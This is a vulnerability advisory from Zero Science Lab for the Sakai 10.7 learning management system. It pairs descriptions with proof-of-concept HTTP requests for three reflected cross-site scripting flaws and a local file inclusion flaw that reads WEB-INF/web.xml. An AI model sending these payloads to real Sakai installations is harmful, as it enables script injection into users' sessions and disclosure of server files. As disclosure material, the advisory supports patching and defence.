Sakai 10.7 Cross Site Scripting / Local File Inclusion

`i>>?  
Sakai 10.7 Multiple Vulnerabilities  
  
  
Vendor: Apereo Foundation  
Product web page: https://www.sakaiproject.org  
Affected version: 10.7 (Kernel 10.7)  
  
Summary: Sakai is a free, community source, educational software  
platform designed to support teaching, research and collaboration.  
Systems of this type are also known as Course Management Systems (CMS),  
Learning Management Systems (LMS), or Virtual Learning Environments (VLE).  
  
Desc: Sakai suffers from multiple reflected cross-site scripting vulnerabilities  
when input passed via several parameters to several scripts is not properly  
sanitized before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context of an  
affected site. Also there is a file disclosure vulnerability when calling  
custom tool script. It is not properly verified before being used to read files.  
This can be exploited to disclose contents of files from local resources.  
  
Tested on: Apache-Coyote/1.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5358  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5358.php  
  
Vendor: https://jira.sakaiproject.org/browse/SAK-26334 (XSS file upload filename param)  
https://jira.sakaiproject.org/browse/SAK-31523 (XSS when creating job)  
https://jira.sakaiproject.org/browse/SAK-31524 (XSS in URI)  
https://jira.sakaiproject.org/browse/SAK-31525 (LFI when calling tools)  
  
  
  
29.06.2016  
  
--  
  
  
XSS when using file upload (filename parameter):  
------------------------------------------------  
  
POST /sakai-fck-connector/web/editor/filemanager/browser/default/connectors/jsp/connector/user/admin/?Command=FileUpload&Type=JSP&CurrentFolder=%2Fgroup%2FPortfolioAdmin%2F HTTP/1.1  
Host: localhost:8080  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryViazQNB5ok9E64l2  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer: http://localhost:8080/library/editor/FCKeditor/editor/filemanager/browser/default/frmresourceslist.html  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Connection: close  
  
------WebKitFormBoundaryViazQNB5ok9E64l2  
Content-Disposition: form-data; name="NewFile"; filename="test.jsp'-alert(1)-'foo"  
Content-Type: application/octet-stream  
  
testingus  
------WebKitFormBoundaryViazQNB5ok9E64l2--  
  
  
Response:  
  
HTTP/1.1 200 OK  
Server: Apache-Coyote/1.1  
X-UA-Compatible: IE=EmulateIE11  
Cache-Control: no-cache  
Content-Type: text/html;charset=UTF-8  
Content-Length: 383  
Date: Wed, 29 Jun 2016 11:45:49 GMT  
Connection: close  
  
<script type="text/javascript">  
(function(){ var d = document.domain ; while ( true ) {  
try { var test = parent.document.domain ; break ; } catch( e ) {}  
d = d.replace( /.*?(?:\.|$)/, '' ) ; if ( d.length == 0 ) break ;  
try { document.domain = d ; } catch (e) { break ; }}})() ;  
window.parent.OnUploadCompleted(201,'','test.jsp'-alert(1)-'foo','');  
</script>  
  
  
  
  
XSS when creating a job (After creating a job, click on "Triggers" link):  
-------------------------------------------------------------------------  
  
GET /portal/tool/~admin-1010/create_job?_id2:job_name=TEST';alert(2)//&_id2%3A_id10=Data+Warehouse+Update&_id2:_id14=Post&com.sun.faces.VIEW=&_id2=_id2 HTTP/1.1  
Host: localhost:8080  
  
  
  
XSS in URI:  
-----------  
  
GET /access/basiclti/site/~admin/axxm4j<img src=a onerror=alert(3)> HTTP/1.1  
Host: localhost:8080  
  
  
LFI when calling custom tool (Affects Apache Wicket tools like Profile2 and Statistics.  
Adding "../" is not needed to reproduce the issue. It can be reproduced just by visiting:  
/portal/tool/[TOOL_ID]/WEB-INF/web.xml):  
----------------------------------------  
  
GET /portal/tool/41fec34b-a47c-4aa5-8786-3873533f44fa/CvnkzU-31z-1QPe7Z2iQOA/../WEB-INF/web.xml HTTP/1.1  
Host: localhost:8080  
  
`